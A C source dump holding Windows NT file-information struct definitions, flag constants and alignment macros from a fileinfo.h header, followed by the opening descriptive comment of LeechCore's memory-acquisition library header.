LARGE_INTEGER AllocationSize;
/**
* File attributes, which can be any valid combination of the following:
*
* \li \c FILE_ATTRIBUTE_READONLY
* \li \c FILE_ATTRIBUTE_HIDDEN
* \li \c FILE_ATTRIBUTE_SYSTEM
* \li \c FILE_ATTRIBUTE_DIRECTORY
* \li \c FILE_ATTRIBUTE_ARCHIVE
* \li \c FILE_ATTRIBUTE_NORMAL
* \li \c FILE_ATTRIBUTE_TEMPORARY
* \li \c FILE_ATTRIBUTE_COMPRESSED
*/
ULONG FileAttributes;
/**
* Specifies the length of the file name string.
*/
ULONG FileNameLength;
/**
* Specifies the first character of the file name string.
* This is followed in memory by the remainder of the string.
*/
WCHAR FileName[1];
} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION;
/**
* \struct FILE_FULL_DIR_INFORMATION
* \brief Used to query detailed information for the files in a directory.
*/
typedef struct _FILE_FULL_DIR_INFORMATION {
/**
* Byte offset of the next FILE_DIRECTORY_INFORMATION entry, if multiple entries are present in a buffer.
* This member is zero if no other entries follow this one.
*/
ULONG NextEntryOffset;
/**
* Byte offset of the file within the parent directory. This member is undefined for file systems, such as NTFS,
* in which the position of a file within the parent directory is not fixed and can be changed at any time to maintain sort order.
*/
ULONG FileIndex;
/**
* Time when the file was created.
*/
LARGE_INTEGER CreationTime;
/**
* Last time the file was accessed.
*/
LARGE_INTEGER LastAccessTime;
/**
* Last time information was written to the file.
*/
LARGE_INTEGER LastWriteTime;
/**
* Last time the file was changed.
*/
LARGE_INTEGER ChangeTime;
/**
* Absolute new end-of-file position as a byte offset from the start of the file.
* EndOfFile specifies the byte offset to the end of the file.
* Because this value is zero-based, it actually refers to the first free byte in the file. In other words,
* EndOfFile is the offset to the byte immediately following the last valid byte in the file.
*/
LARGE_INTEGER EndOfFile;
/**
* File allocation size, in bytes. Usually, this value is a multiple of the sector or cluster size of the underlying physical device.
*/
LARGE_INTEGER AllocationSize;
/**
* File attributes, which can be any valid combination of the following:
*
* \li \c FILE_ATTRIBUTE_READONLY
* \li \c FILE_ATTRIBUTE_HIDDEN
* \li \c FILE_ATTRIBUTE_SYSTEM
* \li \c FILE_ATTRIBUTE_DIRECTORY
* \li \c FILE_ATTRIBUTE_ARCHIVE
* \li \c FILE_ATTRIBUTE_NORMAL
* \li \c FILE_ATTRIBUTE_TEMPORARY
* \li \c FILE_ATTRIBUTE_COMPRESSED
*/
ULONG FileAttributes;
/**
* Specifies the length of the file name string.
*/
ULONG FileNameLength;
/**
* Combined length, in bytes, of the extended attributes (EA) for the file.
*/
ULONG EaSize;
/**
* Specifies the first character of the file name string.
* This is followed in memory by the remainder of the string.
*/
WCHAR FileName[1];
} FILE_FULL_DIR_INFORMATION, *PFILE_FULL_DIR_INFORMATION;
/**
* \struct FILE_ID_FULL_DIR_INFORMATION
* \brief Used to query detailed information for the files in a directory.
*/
typedef struct _FILE_ID_FULL_DIR_INFORMATION {
/**
* Byte offset of the next FILE_DIRECTORY_INFORMATION entry, if multiple entries are present in a buffer.
* This member is zero if no other entries follow this one.
*/
ULONG NextEntryOffset;
/**
* Byte offset of the file within the parent directory. This member is undefined for file systems, such as NTFS,
* in which the position of a file within the parent directory is not fixed and can be changed at any time to maintain sort order.
*/
ULONG FileIndex;
/**
* Time when the file was created.
*/
LARGE_INTEGER CreationTime;
/**
* Last time the file was accessed.
*/
LARGE_INTEGER LastAccessTime;
/**
* Last time information was written to the file.
*/
LARGE_INTEGER LastWriteTime;
/**
* Last time the file was changed.
*/
LARGE_INTEGER ChangeTime;
/**
* Absolute new end-of-file position as a byte offset from the start of the file.
* EndOfFile specifies the byte offset to the end of the file.
* Because this value is zero-based, it actually refers to the first free byte in the file. In other words,
* EndOfFile is the offset to the byte immediately following the last valid byte in the file.
*/
LARGE_INTEGER EndOfFile;
/**
* File allocation size, in bytes. Usually, this value is a multiple of the sector or cluster size of the underlying physical device.
*/
LARGE_INTEGER AllocationSize;
/**
* File attributes, which can be any valid combination of the following:
*
* \li \c FILE_ATTRIBUTE_READONLY
* \li \c FILE_ATTRIBUTE_HIDDEN
* \li \c FILE_ATTRIBUTE_SYSTEM
* \li \c FILE_ATTRIBUTE_DIRECTORY
* \li \c FILE_ATTRIBUTE_ARCHIVE
* \li \c FILE_ATTRIBUTE_NORMAL
* \li \c FILE_ATTRIBUTE_TEMPORARY
* \li \c FILE_ATTRIBUTE_COMPRESSED
*/
ULONG FileAttributes;
/**
* Specifies the length of the file name string.
*/
ULONG FileNameLength;
/**
* Combined length, in bytes, of the extended attributes (EA) for the file.
*/
ULONG EaSize;
/**
* The 8-byte file reference number for the file. (Note that this is not the same as the 16-byte
* "file object ID" that was added to NTFS for Microsoft Windows 2000.)
*/
LARGE_INTEGER FileId;
/**
* Specifies the first character of the file name string.
* This is followed in memory by the remainder of the string.
*/
WCHAR FileName[1];
} FILE_ID_FULL_DIR_INFORMATION, *PFILE_ID_FULL_DIR_INFORMATION;
/**
* \struct FILE_BOTH_DIR_INFORMATION
* \brief Used to query detailed information for the files in a directory.
*/
typedef struct _FILE_BOTH_DIR_INFORMATION {
/**
* Byte offset of the next FILE_DIRECTORY_INFORMATION entry, if multiple entries are present in a buffer.
* This member is zero if no other entries follow this one.
*/
ULONG NextEntryOffset;
/**
* Byte offset of the file within the parent directory. This member is undefined for file systems, such as NTFS,
* in which the position of a file within the parent directory is not fixed and can be changed at any time to maintain sort order.
*/
ULONG FileIndex;
/**
* Time when the file was created.
*/
LARGE_INTEGER CreationTime;
/**
* Last time the file was accessed.
*/
LARGE_INTEGER LastAccessTime;
/**
* Last time information was written to the file.
*/
LARGE_INTEGER LastWriteTime;
/**
* Last time the file was changed.
*/
LARGE_INTEGER ChangeTime;
/**
* Absolute new end-of-file position as a byte offset from the start of the file.
* EndOfFile specifies the byte offset to the end of the file.
* Because this value is zero-based, it actually refers to the first free byte in the file. In other words,
* EndOfFile is the offset to the byte immediately following the last valid byte in the file.
*/
LARGE_INTEGER EndOfFile;
/**
* File allocation size, in bytes. Usually, this value is a multiple of the sector or cluster size of the underlying physical device.
*/
LARGE_INTEGER AllocationSize;
/**
* File attributes, which can be any valid combination of the following:
*
* \li \c FILE_ATTRIBUTE_READONLY
* \li \c FILE_ATTRIBUTE_HIDDEN
* \li \c FILE_ATTRIBUTE_SYSTEM
* \li \c FILE_ATTRIBUTE_DIRECTORY
* \li \c FILE_ATTRIBUTE_ARCHIVE
* \li \c FILE_ATTRIBUTE_NORMAL
* \li \c FILE_ATTRIBUTE_TEMPORARY
* \li \c FILE_ATTRIBUTE_COMPRESSED
*/
ULONG FileAttributes;
/**
* Specifies the length of the file name string.
*/
ULONG FileNameLength;
/**
* Combined length, in bytes, of the extended attributes (EA) for the file.
*/
ULONG EaSize;
/**
* Specifies the length, in bytes, of the short file name string.
*/
CCHAR ShortNameLength;
/**
* Unicode string containing the short (8.3) name for the file.
*/
WCHAR ShortName[12];
/**
* Specifies the first character of the file name string. This is followed in memory by the remainder of the string.
*/
WCHAR FileName[1];
} FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION;
/**
* \struct FILE_ID_BOTH_DIR_INFORMATION
* \brief Used to query detailed information for the files in a directory.
*/
typedef struct _FILE_ID_BOTH_DIR_INFORMATION {
/**
* Byte offset of the next FILE_DIRECTORY_INFORMATION entry, if multiple entries are present in a buffer.
* This member is zero if no other entries follow this one.
*/
ULONG NextEntryOffset;
/**
* Byte offset of the file within the parent directory. This member is undefined for file systems, such as NTFS,
* in which the position of a file within the parent directory is not fixed and can be changed at any time to maintain sort order.
*/
ULONG FileIndex;
/**
* Time when the file was created.
*/
LARGE_INTEGER CreationTime;
/**
* Last time the file was accessed.
*/
LARGE_INTEGER LastAccessTime;
/**
* Last time information was written to the file.
*/
LARGE_INTEGER LastWriteTime;
/**
* Last time the file was changed.
*/
LARGE_INTEGER ChangeTime;
/**
* Absolute new end-of-file position as a byte offset from the start of the file.
* EndOfFile specifies the byte offset to the end of the file.
* Because this value is zero-based, it actually refers to the first free byte in the file. In other words,
* EndOfFile is the offset to the byte immediately following the last valid byte in the file.
*/
LARGE_INTEGER EndOfFile;
/**
* File allocation size, in bytes. Usually, this value is a multiple of the sector or cluster size of the underlying physical device.
*/
LARGE_INTEGER AllocationSize;
/**
* File attributes, which can be any valid combination of the following:
*
* \li \c FILE_ATTRIBUTE_READONLY
* \li \c FILE_ATTRIBUTE_HIDDEN
* \li \c FILE_ATTRIBUTE_SYSTEM
* \li \c FILE_ATTRIBUTE_DIRECTORY
* \li \c FILE_ATTRIBUTE_ARCHIVE
* \li \c FILE_ATTRIBUTE_NORMAL
* \li \c FILE_ATTRIBUTE_TEMPORARY
* \li \c FILE_ATTRIBUTE_COMPRESSED
*/
ULONG FileAttributes;
/**
* Specifies the length of the file name string.
*/
ULONG FileNameLength;
/**
* Combined length, in bytes, of the extended attributes (EA) for the file.
*/
ULONG EaSize;
/**
* Specifies the length, in bytes, of the short file name string.
*/
CCHAR ShortNameLength;
/**
* Unicode string containing the short (8.3) name for the file.
*/
WCHAR ShortName[12];
/**
* The 8-byte file reference number for the file. This number is generated and assigned to the file by the file system.
* (Note that the FileId is not the same as the 16-byte "file object ID" that was added to NTFS for Microsoft Windows 2000.)
*/
LARGE_INTEGER FileId;
/**
* Specifies the first character of the file name string. This is followed in memory by the remainder of the string.
*/
WCHAR FileName[1];
} FILE_ID_BOTH_DIR_INFORMATION, *PFILE_ID_BOTH_DIR_INFORMATION;
/**
* \struct FILE_ID_EXTD_BOTH_DIR_INFORMATION
* \brief Used to query detailed information for the files in a directory.
*/
typedef struct _FILE_ID_EXTD_BOTH_DIR_INFORMATION {
/**
* Byte offset of the next FILE_DIRECTORY_INFORMATION entry, if multiple entries are present in a buffer.
* This member is zero if no other entries follow this one.
*/
ULONG NextEntryOffset;
/**
* Byte offset of the file within the parent directory. This member is undefined for file systems, such as NTFS,
* in which the position of a file within the parent directory is not fixed and can be changed at any time to maintain sort order.
*/
ULONG FileIndex;
/**
* Time when the file was created.
*/
LARGE_INTEGER CreationTime;
/**
* Last time the file was accessed.
*/
LARGE_INTEGER LastAccessTime;
/**
* Last time information was written to the file.
*/
LARGE_INTEGER LastWriteTime;
/**
* Last time the file was changed.
*/
LARGE_INTEGER ChangeTime;
/**
* Absolute new end-of-file position as a byte offset from the start of the file.
* EndOfFile specifies the byte offset to the end of the file.
* Because this value is zero-based, it actually refers to the first free byte in the file. In other words,
* EndOfFile is the offset to the byte immediately following the last valid byte in the file.
*/
LARGE_INTEGER EndOfFile;
/**
* File allocation size, in bytes. Usually, this value is a multiple of the sector or cluster size of the underlying physical device.
*/
LARGE_INTEGER AllocationSize;
/**
* File attributes, which can be any valid combination of the following:
*
* \li \c FILE_ATTRIBUTE_READONLY
* \li \c FILE_ATTRIBUTE_HIDDEN
* \li \c FILE_ATTRIBUTE_SYSTEM
* \li \c FILE_ATTRIBUTE_DIRECTORY
* \li \c FILE_ATTRIBUTE_ARCHIVE
* \li \c FILE_ATTRIBUTE_NORMAL
* \li \c FILE_ATTRIBUTE_TEMPORARY
* \li \c FILE_ATTRIBUTE_COMPRESSED
*/
ULONG FileAttributes;
/**
* Specifies the length of the file name string.
*/
ULONG FileNameLength;
/**
* Combined length, in bytes, of the extended attributes (EA) for the file.
*/
ULONG EaSize;
/**
* Tag value for the reparse point.
*/
ULONG ReparsePointTag;
/**
* The 128-byte file reference number for the file. This number is generated and assigned to the file by the file system.
*/
FILE_ID_128 FileId;
/**
* Specifies the length, in bytes, of the short file name string.
*/
CCHAR ShortNameLength;
/**
* Unicode string containing the short (8.3) name for the file.
*/
WCHAR ShortName[12];
/**
* Specifies the first character of the file name string. This is followed in memory by the remainder of the string.
*/
WCHAR FileName[1];
} FILE_ID_EXTD_BOTH_DIR_INFORMATION, *PFILE_ID_EXTD_BOTH_DIR_INFORMATION;
/**
* \struct FILE_NAMES_INFORMATION
* \brief Used to query detailed information about the names of files in a directory.
*/
typedef struct _FILE_NAMES_INFORMATION {
/**
* Byte offset for the next FILE_NAMES_INFORMATION entry, if multiple entries are present in a buffer.
* This member is zero if no other entries follow this one.
*/
ULONG NextEntryOffset;
/**
* Byte offset of the file within the parent directory. This member is undefined for file systems, such as NTFS,
* in which the position of a file within the parent directory is not fixed and can be changed at any time to maintain sort order.
*/
ULONG FileIndex;
/**
* Specifies the length of the file name string.
*/
ULONG FileNameLength;
/**
* Specifies the first character of the file name string. This is followed in memory by the remainder of the string.
*/
WCHAR FileName[1];
} FILE_NAMES_INFORMATION, *PFILE_NAMES_INFORMATION;
#define ANSI_DOS_STAR ('<')
#define ANSI_DOS_QM ('>')
#define ANSI_DOS_DOT ('"')
#define DOS_STAR (L'<')
#define DOS_QM (L'>')
#define DOS_DOT (L'"')
/**
* \struct FILE_INTERNAL_INFORMATION
* \brief Used to query for the file system's 8-byte file reference number for a file.
*
* The struct is requested during IRP_MJ_QUERY_INFORMATION with query FileInternalInformation
*/
typedef struct _FILE_INTERNAL_INFORMATION {
/**
* The 8-byte file reference number for the file. This number is assigned by the file system and is file-system-specific.
* (Note that this is not the same as the 16-byte "file object ID" that was added to NTFS for Microsoft Windows 2000.)
*/
LARGE_INTEGER IndexNumber;
} FILE_INTERNAL_INFORMATION, *PFILE_INTERNAL_INFORMATION;
/**
* \struct FILE_ID_INFORMATION
* \brief Contains identification information for a file.
*
* This structure is returned from the GetFileInformationByHandleEx function when FileIdInfo is passed in the FileInformationClass parameter.
*
* The struct is requested during IRP_MJ_QUERY_INFORMATION with query FileIdInformation
*/
typedef struct _FILE_ID_INFORMATION {
/**
* The serial number of the volume that contains a file.
*/
ULONGLONG VolumeSerialNumber;
/**
* The 128-bit file identifier for the file. The file identifier and the volume serial number uniquely identify a file on a single computer.
* To determine whether two open handles represent the same file, combine the identifier and the volume serial number for each file and compare them.
*/
FILE_ID_128 FileId;
} FILE_ID_INFORMATION, *PFILE_ID_INFORMATION;
/**
* \struct FILE_EA_INFORMATION
* \brief Used to query for the size of the extended attributes (EA) for a file.
*
* The struct is requested during IRP_MJ_QUERY_INFORMATION with query FileEaInformation and FileAllInformation
*/
typedef struct _FILE_EA_INFORMATION {
/**
* Specifies the combined length, in bytes, of the extended attributes for the file.
*/
ULONG EaSize;
} FILE_EA_INFORMATION, *PFILE_EA_INFORMATION;
/**
* \struct FILE_ACCESS_INFORMATION
* \brief Used to query for or set the access rights of a file.
*
* The struct is requested during IRP_MJ_QUERY_INFORMATION with query FileAllInformation
*/
typedef struct _FILE_ACCESS_INFORMATION {
/**
* Flags that specify a set of access rights in the access mask of an access control entry.
* This member is a value of type ACCESS_MASK.
*/
ACCESS_MASK AccessFlags;
} FILE_ACCESS_INFORMATION, *PFILE_ACCESS_INFORMATION;
/**
* \struct FILE_MODE_INFORMATION
* \brief Used to query or set the access mode of a file.
*
* The struct is requested during IRP_MJ_QUERY_INFORMATION with query FileAllInformation
*/
typedef struct _FILE_MODE_INFORMATION {
/**
* Specifies the mode in which the file will be accessed following a create-file or open-file operation.
* This parameter is either zero or the bitwise OR of one or more of the following file option flags:
*
* \li \c FILE_WRITE_THROUGH
* \li \c FILE_SEQUENTIAL_ONLY
* \li \c FILE_NO_INTERMEDIATE_BUFFERING
* \li \c FILE_SYNCHRONOUS_IO_ALERT
* \li \c FILE_SYNCHRONOUS_IO_NONALERT
* \li \c FILE_DELETE_ON_CLOSE
*/
ULONG Mode;
} FILE_MODE_INFORMATION, *PFILE_MODE_INFORMATION;
/**
* \struct FILE_ALL_INFORMATION
* \brief Structure is a container for several FILE_XXX_INFORMATION structures.
*
* The struct is requested during IRP_MJ_QUERY_INFORMATION with query FileAllInformation
*/
typedef struct _FILE_ALL_INFORMATION {
/** \see FILE_BASIC_INFORMATION */
FILE_BASIC_INFORMATION BasicInformation;
/** \see FILE_STANDARD_INFORMATION */
FILE_STANDARD_INFORMATION StandardInformation;
/** \see FILE_INTERNAL_INFORMATION */
FILE_INTERNAL_INFORMATION InternalInformation;
/** \see FILE_EA_INFORMATION */
FILE_EA_INFORMATION EaInformation;
/** \see FILE_ACCESS_INFORMATION */
FILE_ACCESS_INFORMATION AccessInformation;
/** \see FILE_POSITION_INFORMATION */
FILE_POSITION_INFORMATION PositionInformation;
/** \see FILE_MODE_INFORMATION */
FILE_MODE_INFORMATION ModeInformation;
/** \see FILE_ALIGNMENT_INFORMATION */
FILE_ALIGNMENT_INFORMATION AlignmentInformation;
/** \see FILE_NAME_INFORMATION */
FILE_NAME_INFORMATION NameInformation;
} FILE_ALL_INFORMATION, *PFILE_ALL_INFORMATION;
/**
* \struct FILE_ALLOCATION_INFORMATION
* \brief Used to set the allocation size for a file.
*
* The struct is requested during IRP_MJ_SET_INFORMATION with query FileAllocationInformation
*/
typedef struct _FILE_ALLOCATION_INFORMATION {
/**
* File allocation size, in bytes. Usually this value is a multiple
* of the sector or cluster size of the underlying physical device.
*/
LARGE_INTEGER AllocationSize;
} FILE_ALLOCATION_INFORMATION, *PFILE_ALLOCATION_INFORMATION;
/**
* \struct FILE_LINK_INFORMATION
* \brief Used to create an NTFS hard link to an existing file.
*
* The struct is requested during IRP_MJ_SET_INFORMATION with query FileLinkInformation
*/
typedef struct _FILE_LINK_INFORMATION {
/**
* Set to TRUE to specify that if the link already exists, it should be replaced with the new link.
* Set to FALSE if the link creation operation should fail if the link already exists.
*/
BOOLEAN ReplaceIfExists;
/**
* If the link is to be created in the same directory as the file that is being linked to,
* or if the FileName member contains the full pathname for the link to be created, this is NULL.
* Otherwise it is a handle for the directory where the link is to be created.
*/
HANDLE RootDirectory;
/**
* Length, in bytes, of the file name string.
*/
ULONG FileNameLength;
/**
* The first character of the name to be assigned to the newly created link.
* This is followed in memory by the remainder of the string.
* If the RootDirectory member is NULL and the link is to be created in a different directory from the file that is being linked to,
* this member specifies the full pathname for the link to be created. Otherwise, it specifies only the file name.
* (See the Remarks section for ZwQueryInformationFile for details on the syntax of this file name string.)
*/
WCHAR FileName[1];
} FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION;
/**
* \struct FILE_RENAME_INFORMATION
* \brief Used to rename a file.
*
* The struct is requested during IRP_MJ_SET_INFORMATION with query FileRenameInformation
*/
typedef struct _FILE_RENAME_INFORMATION {
/**
* Set to TRUE to specify that if a file with the given name already exists, it should be replaced with the given file.
* Set to FALSE if the rename operation should fail if a file with the given name already exists.
*/
BOOLEAN ReplaceIfExists;
/**
* If the file is not being moved to a different directory,
* or if the FileName member contains the full pathname, this member is NULL. Otherwise,
* it is a handle for the root directory under which the file will reside after it is renamed.
*/
HANDLE RootDirectory;
/**
* Length, in bytes, of the new name for the file.
*/
ULONG FileNameLength;
/**
* The first character of a wide-character string containing the new name for the file.
* This is followed in memory by the remainder of the string. If the RootDirectory member is NULL,
* and the file is being moved to a different directory, this member specifies the full pathname to be assigned to the file.
* Otherwise, it specifies only the file name or a relative pathname.
*/
WCHAR FileName[1];
} FILE_RENAME_INFORMATION, *PFILE_RENAME_INFORMATION;
/**
* \struct FILE_STREAM_INFORMATION
* \brief Used to enumerate the streams for a file.
*
* The struct is requested during IRP_MJ_SET_INFORMATION query FileStreamInformation
*/
typedef struct _FILE_STREAM_INFORMATION {
/**
* The offset of the next FILE_STREAM_INFORMATION entry.
* This member is zero if no other entries follow this one.
*/
ULONG NextEntryOffset;
/**
* Length, in bytes, of the StreamName string.
*/
ULONG StreamNameLength;
/**
* Size, in bytes, of the stream.
*/
LARGE_INTEGER StreamSize;
/**
* File stream allocation size, in bytes. Usually this value is a multiple of the sector
* or cluster size of the underlying physical device.
*/
LARGE_INTEGER StreamAllocationSize;
/**
* Unicode string that contains the name of the stream.
*/
WCHAR StreamName[1];
} FILE_STREAM_INFORMATION, *PFILE_STREAM_INFORMATION;
/**
* \struct FILE_FS_LABEL_INFORMATION
* \brief Used to set the label for a file system volume.
*
* The struct is requested during IRP_MJ_SET_VOLUME_INFORMATION query FileFsLabelInformation
*/
typedef struct _FILE_FS_LABEL_INFORMATION {
/**
* Length, in bytes, of the name for the volume.
*/
ULONG VolumeLabelLength;
/**
* Name for the volume.
*/
WCHAR VolumeLabel[1];
} FILE_FS_LABEL_INFORMATION, *PFILE_FS_LABEL_INFORMATION;
/**
* \struct FILE_FS_VOLUME_INFORMATION
* \brief Used to query information about a volume on which a file system is mounted.
*
* The struct is requested during IRP_MJ_QUERY_VOLUME_INFORMATION query FileFsVolumeInformation
*/
typedef struct _FILE_FS_VOLUME_INFORMATION {
/**
* Time when the volume was created.
*/
LARGE_INTEGER VolumeCreationTime;
/**
* Serial number of the volume.
*/
ULONG VolumeSerialNumber;
/**
* Length, in bytes, of the name of the volume.
*/
ULONG VolumeLabelLength;
/**
* TRUE if the file system supports object-oriented file system objects, FALSE otherwise.
*/
BOOLEAN SupportsObjects;
/**
* Name of the volume.
*/
WCHAR VolumeLabel[1];
} FILE_FS_VOLUME_INFORMATION, *PFILE_FS_VOLUME_INFORMATION;
/**
* \struct FILE_FS_SIZE_INFORMATION
* \brief Used to query sector size information for a file system volume.
*
* The struct is requested during IRP_MJ_QUERY_VOLUME_INFORMATION query FileFsSizeInformation
*/
typedef struct _FILE_FS_SIZE_INFORMATION {
/**
* Total number of allocation units on the volume that are available to the user associated with the calling thread.
* If per-user quotas are in use, this value may be less than the total number of allocation units on the disk.
*/
LARGE_INTEGER TotalAllocationUnits;
/**
* Total number of free allocation units on the volume that are available to the user associated with the calling thread.
* If per-user quotas are in use, this value may be less than the total number of free allocation units on the disk.
*/
LARGE_INTEGER AvailableAllocationUnits;
/**
* Number of sectors in each allocation unit.
*/
ULONG SectorsPerAllocationUnit;
/**
* Number of bytes in each sector.
*/
ULONG BytesPerSector;
} FILE_FS_SIZE_INFORMATION, *PFILE_FS_SIZE_INFORMATION;
/**
* \struct FILE_FS_FULL_SIZE_INFORMATION
* \brief Used to query sector size information for a file system volume.
*
* The struct is requested during IRP_MJ_QUERY_VOLUME_INFORMATION query FileFsFullSizeInformation
*/
typedef struct _FILE_FS_FULL_SIZE_INFORMATION {
/**
* Total number of allocation units on the volume that are available to the user associated with the calling thread.
* If per-user quotas are in use, this value may be less than the total number of allocation units on the disk.
*/
LARGE_INTEGER TotalAllocationUnits;
/**
* Total number of free allocation units on the volume that are available to the user associated with the calling thread.
* If per-user quotas are in use, this value may be less than the total number of free allocation units on the disk.
*/
LARGE_INTEGER CallerAvailableAllocationUnits;
/**
* Total number of free allocation units on the volume.
*/
LARGE_INTEGER ActualAvailableAllocationUnits;
/**
* Number of sectors in each allocation unit.
*/
ULONG SectorsPerAllocationUnit;
/**
* Number of bytes in each sector.
*/
ULONG BytesPerSector;
} FILE_FS_FULL_SIZE_INFORMATION, *PFILE_FS_FULL_SIZE_INFORMATION;
/**
* \struct FILE_FS_ATTRIBUTE_INFORMATION
* \brief Used to query attribute information for a file system.
*
* The struct is requested during IRP_MJ_QUERY_VOLUME_INFORMATION query FileFsAttributeInformation
*/
typedef struct _FILE_FS_ATTRIBUTE_INFORMATION {
/**
* Bitmask of flags specifying attributes of the specified file system.
* \see https://msdn.microsoft.com/en-us/library/windows/hardware/ff540251(v=vs.85).aspx
*/
ULONG FileSystemAttributes;
/**
* Maximum file name component length, in bytes, supported by the specified file system.
* A file name component is that portion of a file name between backslashes.
*/
LONG MaximumComponentNameLength;
/**
* Length, in bytes, of the file system name.
*/
ULONG FileSystemNameLength;
/**
* File system name.
*/
WCHAR FileSystemName[1];
} FILE_FS_ATTRIBUTE_INFORMATION, *PFILE_FS_ATTRIBUTE_INFORMATION;
/**
* \struct FILE_NETWORK_OPEN_INFORMATION
* \brief Used as an argument to ZwQueryInformationFile.
*
* The struct is requested during IRP_MJ_QUERY_VOLUME_INFORMATION query FileNetworkOpenInformation
*/
typedef struct _FILE_NETWORK_OPEN_INFORMATION {
/**
* Specifies the time that the file was created.
*/
LARGE_INTEGER CreationTime;
/**
* Specifies the time that the file was last accessed.
*/
LARGE_INTEGER LastAccessTime;
/**
* Specifies he time that the file was last written to.
*/
LARGE_INTEGER LastWriteTime;
/**
* Specifies the time that the file was last changed.
*/
LARGE_INTEGER ChangeTime;
/**
* Specifies the file allocation size, in bytes. Usually,
* this value is a multiple of the sector or cluster size of the underlying physical device.
*/
LARGE_INTEGER AllocationSize;
/**
* Specifies the absolute end-of-file position as a byte offset from the start of the file.
* EndOfFile specifies the byte offset to the end of the file. Because this value is zero-based,
* it actually refers to the first free byte in the file. In other words,
* EndOfFile is the offset to the byte immediately following the last valid byte in the file.
*/
LARGE_INTEGER EndOfFile;
/**
* Specifies one or more FILE_ATTRIBUTE_XXX flags. For descriptions of these flags,
* see the documentation of the GetFileAttributes function in the Microsoft Windows SDK.
*/
ULONG FileAttributes;
} FILE_NETWORK_OPEN_INFORMATION, *PFILE_NETWORK_OPEN_INFORMATION;
/**
* \struct FILE_NETWORK_PHYSICAL_NAME_INFORMATION
* \brief Contains the full UNC physical pathname for a file or directory on a remote file share.
*
* The struct is requested during IRP_MJ_QUERY_VOLUME_INFORMATION query FileNetworkPhysicalNameInformation
*/
typedef struct _FILE_NETWORK_PHYSICAL_NAME_INFORMATION {
/**
* The length, in bytes, of the physical name in FileName.
*/
ULONG FileNameLength;
/**
* The full UNC path of the network file share of the target.
*/
WCHAR FileName[1];
} FILE_NETWORK_PHYSICAL_NAME_INFORMATION,
*PFILE_NETWORK_PHYSICAL_NAME_INFORMATION;
#define SL_RESTART_SCAN 0x01
#define SL_RETURN_SINGLE_ENTRY 0x02
#define SL_INDEX_SPECIFIED 0x04
#define SL_FORCE_ACCESS_CHECK 0x01
#define SL_OPEN_PAGING_FILE 0x02
#define SL_OPEN_TARGET_DIRECTORY 0x04
#define SL_CASE_SENSITIVE 0x80
#define ALIGN_DOWN(length, type) ((ULONG)(length) & ~(sizeof(type) - 1))
#define ALIGN_UP(length, type) \
(ALIGN_DOWN(((ULONG)(length) + sizeof(type) - 1), type))
#define ALIGN_DOWN_POINTER(address, type) \
((PVOID)((ULONG_PTR)(address) & ~((ULONG_PTR)sizeof(type) - 1)))
#define ALIGN_UP_POINTER(address, type) \
(ALIGN_DOWN_POINTER(((ULONG_PTR)(address) + sizeof(type) - 1), type))
#define WordAlign(Val) (ALIGN_UP(Val, WORD))
#define WordAlignPtr(Ptr) (ALIGN_UP_POINTER(Ptr, WORD))
#define LongAlign(Val) (ALIGN_UP(Val, LONG))
#define LongAlignPtr(Ptr) (ALIGN_UP_POINTER(Ptr, LONG))
#define QuadAlign(Val) (ALIGN_UP(Val, ULONGLONG))
#define QuadAlignPtr(Ptr) (ALIGN_UP_POINTER(Ptr, ULONGLONG))
#define IsPtrQuadAligned(Ptr) (QuadAlignPtr(Ptr) == (PVOID)(Ptr))
// from wdm.h
#define FILE_SUPERSEDE 0x00000000
#define FILE_OPEN 0x00000001
#define FILE_CREATE 0x00000002
#define FILE_OPEN_IF 0x00000003
#define FILE_OVERWRITE 0x00000004
#define FILE_OVERWRITE_IF 0x00000005
#define FILE_MAXIMUM_DISPOSITION 0x00000005
#define FILE_DIRECTORY_FILE 0x00000001
#define FILE_WRITE_THROUGH 0x00000002
#define FILE_SEQUENTIAL_ONLY 0x00000004
#define FILE_NO_INTERMEDIATE_BUFFERING 0x00000008
#define FILE_SYNCHRONOUS_IO_ALERT 0x00000010
#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020
#define FILE_NON_DIRECTORY_FILE 0x00000040
#define FILE_CREATE_TREE_CONNECTION 0x00000080
#define FILE_COMPLETE_IF_OPLOCKED 0x00000100
#define FILE_NO_EA_KNOWLEDGE 0x00000200
#define FILE_OPEN_REMOTE_INSTANCE 0x00000400
#define FILE_RANDOM_ACCESS 0x00000800
#define FILE_DELETE_ON_CLOSE 0x00001000
#define FILE_OPEN_BY_FILE_ID 0x00002000
#define FILE_OPEN_FOR_BACKUP_INTENT 0x00004000
#define FILE_NO_COMPRESSION 0x00008000
#if (_WIN32_WINNT >= _WIN32_WINNT_WIN7)
#define FILE_OPEN_REQUIRING_OPLOCK 0x00010000
#define FILE_DISALLOW_EXCLUSIVE 0x00020000
#endif /* _WIN32_WINNT >= _WIN32_WINNT_WIN7 */
#if (_WIN32_WINNT >= _WIN32_WINNT_WIN8)
#define FILE_SESSION_AWARE 0x00040000
#endif /* _WIN32_WINNT >= _WIN32_WINNT_WIN7 */
#define FILE_RESERVE_OPFILTER 0x00100000
#define FILE_OPEN_REPARSE_POINT 0x00200000
#define FILE_OPEN_NO_RECALL 0x00400000
#define FILE_OPEN_FOR_FREE_SPACE_QUERY 0x00800000
#define FILE_VALID_OPTION_FLAGS 0x00ffffff
#define FILE_SUPERSEDED 0x00000000
#define FILE_OPENED 0x00000001
#define FILE_CREATED 0x00000002
#define FILE_OVERWRITTEN 0x00000003
#define FILE_EXISTS 0x00000004
#define FILE_DOES_NOT_EXIST 0x00000005
#define FILE_WRITE_TO_END_OF_FILE 0xffffffff
#define FILE_USE_FILE_POINTER_POSITION 0xfffffffe
/**
* \struct UNICODE_STRING
* \brief Structure is used to define Unicode strings.
*/
typedef struct _UNICODE_STRING {
/**
* The length, in bytes, of the string stored in Buffer.
*/
USHORT Length;
/**
* The length, in bytes, of Buffer.
*/
USHORT MaximumLength;
/**
* Pointer to a buffer used to contain a string of wide characters.
*/
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
#endif // FILEINFO_H_
================================================
FILE: includes/leechcore.h
================================================
// leechcore.h : external header of the LeechCore library.
//
// LeechCore is a library which abstracts away reading and writing to various
// software and hardware acquisition sources. Sources ranges from memory dump
// files to driver backed live memory to hardware (FPGA) DMA backed memory.
//
// LeechCore built-in device support may be extended with external plugin
// device drivers placed as .dll or .so files in the same folder as LeechCore.
//
